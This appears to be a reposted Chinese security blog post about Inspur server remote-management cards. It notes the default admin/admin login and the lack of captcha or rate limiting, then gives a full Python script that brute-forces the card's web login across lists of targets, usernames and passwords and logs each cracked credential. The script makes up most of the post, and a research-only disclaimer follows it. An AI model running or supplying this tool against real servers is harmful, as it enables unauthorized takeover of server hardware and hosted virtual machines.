浪潮远控卡是一款插在服务器上的,方便运维人员和服务器管理人员对服务器进行远程控制的WEB服务,其在80端口对外提供HTTP服务。登录进去以后可以对服务器硬件进行远程控制和管理。例如CPU、内存等性能指标监控,远程开启关闭服务器上的虚拟机,甚至作为控制虚拟主机的跳板机。
爆破成功
浪潮远控卡可以尝试使用admin/admin进行登录尝试,很有可能可以进去。另外浪潮远控卡登录没有验证码,没有频率测试限制,可以轻松使用burpsuite进行登录爆破尝试。
下面是某位大大的脚本
#!/usr/bin/env python # -*- coding:utf-8 -*- #import lib files import os import sys import logging import requests from optparse import OptionParser #global configuration set reload(sys) sys.setdefaultencoding("utf-8") logging.basicConfig(format='%(asctime)s-%(message)s',datefmt='%Y-%m-%d %H:%M:%S %p',level=logging.INFO) #global varites defines HEADER = { "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:57.0) Gecko/20100101 Firefox/57.0", "Accept":"application/json, text/plain, */*", "Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding":"gzip, deflate", "Content-Type":"application/json;charset=utf-8" } SUCCESS_FLAG = "SESSION_COOKIE" USERNAME_LIST = ["admin"] PASSWORD_LIST = ["admin"] #global functions defines def config_read_from_file(userfile,pswdfile): global USERNAME_LIST global PASSWORD_LIST logging.info("[+] Read Configuration From File ...") try: with open(userfile,"r") as fr: for line in fr.readlines(): line = line.split("/n")[0].split("/r")[0] USERNAME_LIST.append(line) except Exception,ex: logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex) logging.error(logstr) logging.info("[+] Use Default Dict!") try: with open(pswdfile,"r") as fr: for line in fr.readlines(): line = line.split("/n")[0].split("/r")[0] PASSWORD_LIST.append(line) except Exception,ex: logstr = "[-] Configuration Read From File Failed! Reason:%s"%str(ex) logging.error(logstr) logging.info("[+] Use Default Dict!") return 0 def login_packet_send(target,username,password): login_data = {"WEBVAR_USERNAME":username,"WEBVAR_PASSWORD":password} try: response = requests.post("http://%s/rpc/WEBSES/create.asp"%str(target),headers=HEADER,data=login_data,timeout=5) except Exception,ex: logstr = "[-] Connect Failed Reason:%s"%str(ex) logging.error(logstr) return -1 if response.status_code != 200: return -1 else: return response.content def vuln_check(content): if content.find(SUCCESS_FLAG) >= 0 and content.find("Failure_Login_IPMI_Then_LDAP_then_Active_Directory_Radius") < 0: return 0 else: return -1 def crack(target,username,password): content = login_packet_send(target,username,password) if content != -1: if vuln_check(content) == 0: logging.info("[*] Crack %s Success! Username:%s,Password:%s"%(str(target),str(username),str(password))) return 0 return -1 def scan(target,targettype): targetlist = [] if targettype == 1: try: with open(target,"r") as fr: for line in fr.readlines(): line = line.split("/n")[0].split("/r")[0].replace(" ","") targetlist.append(line) except Exception,ex: pass else: targetlist = [target] if len(target) > 0: for item in targetlist: for user in USERNAME_LIST: for pswd in PASSWORD_LIST: crack(item,user,pswd) #main function -- programme if __name__ == "__main__": parser = OptionParser() parser.add_option("-t", "--target", dest="target",help="target to check") parser.add_option("-f", "--filename", dest="targetfile",help="targetfiel to check") parser.add_option("-u", "--userfile", dest="userfile",help="username dict") parser.add_option("-p", "--pswdfile", dest="pswdfile",help="password dict") (options, args) = parser.parse_args() config_read_from_file(options.userfile,options.pswdfile) if options.target not in ["",None," "]: scan(options.target,0) elif options.targetfile not in ["",None," "]: scan(options.targetfile,1)
原文:http://www.cnblogs.com/KevinGeorge/p/8358456.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论